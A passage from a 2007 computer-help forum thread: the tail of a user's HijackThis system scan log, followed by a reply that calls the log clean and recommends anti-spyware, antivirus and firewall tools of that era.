{2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\inetrepl.dllO9 - Extra button: Advanced Searchbar - {43F02779-6D88-4958-8AD3-83C12D86ADC7} - (no file)O9 - Extra 'Tools' menuitem: Advanced Searchbar - {43F02779-6D88-4958-8AD3-83C12D86ADC7} - (no file)O9 - Extra button: AOL Toolbar - {4982D40A-C53B-4615-B15B-B5B5E98D167C} - C:\WINDOWS\System32\shdocvw.dllO9 - Extra 'Tools' menuitem: AOL Toolbar - {4982D40A-C53B-4615-B15B-B5B5E98D167C} - C:\WINDOWS\System32\shdocvw.dllO9 - Extra button: ShopperReports - Compare product prices - {946B3E9E-E21A-49c8-9F63-900533FAFE15} - (no file)O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dllO9 - Extra button: MoneySide - {E023F504-0C5A-4750-A1E7-A9046DEA8A21} - C:\Program Files\Microsoft Money\System\mnyviewer.dllO9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exeO9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exeO16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204O16 - DPF: {7584C670-2274-4EFB-B00B-D6AABA6D3850} (Microsoft RDP Client Control (redist)) - https://mypc.genxsp.net/msrdp.cabO16 - DPF: {79D6214F-CFCE-480F-9901-27950E78F1E6} (WebCacheCleaner Class) - https://mypc.genxsp.net/MLWebCacheCleaner.cabO16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://acs.pandasoftware.com/activescan/as5free/asinst.cabO20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLLO22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\System32\browseui.dllO22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\System32\browseui.dllO23 - Service: Automatic LiveUpdate Scheduler - Symantec Corporation - C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exeO23 - Service: C-DillaCdaC11BA - Macrovision - C:\WINDOWS\System32\drivers\CDAC11BA.EXEO23 - Service: CaCCProvSP - Unknown owner - C:\Program Files\CA\CA Internet Security Suite\ccprovsp.exeO23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exeO23 - Service: Symantec Password Validation (ccPwdSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccPwdSvc.exeO23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exeO23 - Service: DSBrokerService - Unknown owner - C:\Program Files\DellSupport\brkrsvc.exeO23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exeO23 - Service: iPod Service - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exeO23 - Service: CA Pest Patrol Realtime Protection Service (ITMRTSVC) - CA, Inc. - C:\Program Files\CA\SharedComponents\PPRT\bin\ITMRTSVC.exeO23 - Service: LiveUpdate - Symantec Corporation - C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXEO23 - Service: Norton AntiVirus Auto-Protect Service (navapsvc) - Symantec Corporation - C:\Program Files\Norton AntiVirus\navapsvc.exeO23 - Service: Intel® NMS (NMSSvc) - Intel Corporation - C:\WINDOWS\System32\NMSSvc.exeO23 - Service: Norton AntiVirus Firewall Monitor Service (NPFMntor) - Symantec Corporation - C:\Program Files\Norton AntiVirus\IWP\NPFMntor.exeO23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exeO23 - Service: PPCtlPriv - CA, Inc. - C:\Program Files\CA\eTrust PestPatrol\PPCtlPriv.exeO23 - Service: SAVScan - Symantec Corporation - C:\Program Files\Norton AntiVirus\SAVScan.exeO23 - Service: ScriptBlocking Service (SBService) - Symantec Corporation - C:\PROGRA~1\COMMON~1\SYMANT~1\SCRIPT~1\SBServ.exeO23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exeO23 - Service: Symantec SPBBCSvc (SPBBCSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exeO23 - Service: Symantec Core LC - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe--End of file - 10688 bytes Link to post Share on other sites More sharing options...
therock247uk Posted July 13, 2007 ID:6299 Share Posted July 13, 2007 You could try posting about your issues here... http://www.malwarebytes.org/forums/index.p...&s=&f=6 There not malware issues...Your log is clean.Here are some tips, to reduce the potential for spyware infection in the future, I strongly recommend installing the following applications:Detect and Remove Programs:How to use Ad-Aware to remove Spyware <= If you suspect that you have spyware installed on your computer, here are instructions on how to download, install and then use Ad-Aware.How to use Spybot to remove Spyware <= If you suspect that you have spyware installed on your computer, here are instructions on how to download, install and then use Spybot. Similar to Ad-Aware, I strongly recommend both to catch most spyware.Prevention Programs: Spywareblaster <= SpywareBlaster will prevent spyware from being installed.Spywareguard <= SpywareGuard offers realtime protection from spyware installation attempts.IE/Spyad <= IE/Spyad places over 4000 websites and domains in the IE Restricted list which will severely impair attempts to infect your system. It basically prevents any downloads (Cookies etc) from the sites listed, although you will still be able to connect to the sites.MVPS Hosts file <= The MVPS Hosts file replaces your current HOSTS file with one containing well know ad sites etc. Basically, this prevents your coputer from connecting to those sites by redirecting them to 127.0.0.1 which is your local computerGoogle Toolbar <= Get the free google toolbar to help stop pop up windows.I also suggest that you delete any files from "temp", "tmp" folders. In Internet Explorer, click on "Tools" => "Internet Options" => "Delete Files" and select the box that says "Delete All Offline Content" and click on "OK" twice. Also, empty the recycle bin by right clicking on it and selecting "Empty Recycle Bin". These steps should be done on a regular basis.Other necessary Programs: AntiVirus Program<= An AntiVirus program is a must! Whether it is a free version like AVG or Anti-Vir, or a shareware version like Norton or Kapersky, this is a must have.Firewall<= A firewall is definatley a must have. Three good free versions are Kerio, Sygate and ZoneLabs. Link to post Share on other sites More sharing options...
Recommended Posts